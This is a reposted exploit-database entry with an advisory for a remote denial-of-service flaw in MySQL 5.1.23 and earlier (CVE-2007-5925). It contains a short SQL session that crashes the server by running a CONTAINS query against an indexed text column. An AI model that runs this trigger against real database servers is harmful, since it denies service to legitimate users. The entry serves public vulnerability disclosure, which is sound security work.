- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 30744
- Проверка EDB
-
- Пройдено
- Автор
- JOE GALLO
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2007-5925
- Дата публикации
- 2007-11-05
Код:
source: https://www.securityfocus.com/bid/26353/info
MySQL is prone to a remote denial-of-service vulnerability because the database server fails to properly handle unexpected input.
Exploiting this issue allows remote attackers to crash affected database servers, denying service to legitimate users. Attackers must be able to execute arbitrary SQL statements on affected servers, which requires valid credentials to connect to affected servers.
This issue affects MySQL 5.1.23 and prior versions.
mysql> CREATE TABLE `test` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`foo` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
Query OK, 0 rows affected
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
Empty set
mysql> ALTER TABLE test ADD INDEX (foo(100));
Query OK, 0 rows affected
Records: 0 Duplicates: 0 Warnings: 0
mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar');
- Источник
- www.exploit-db.com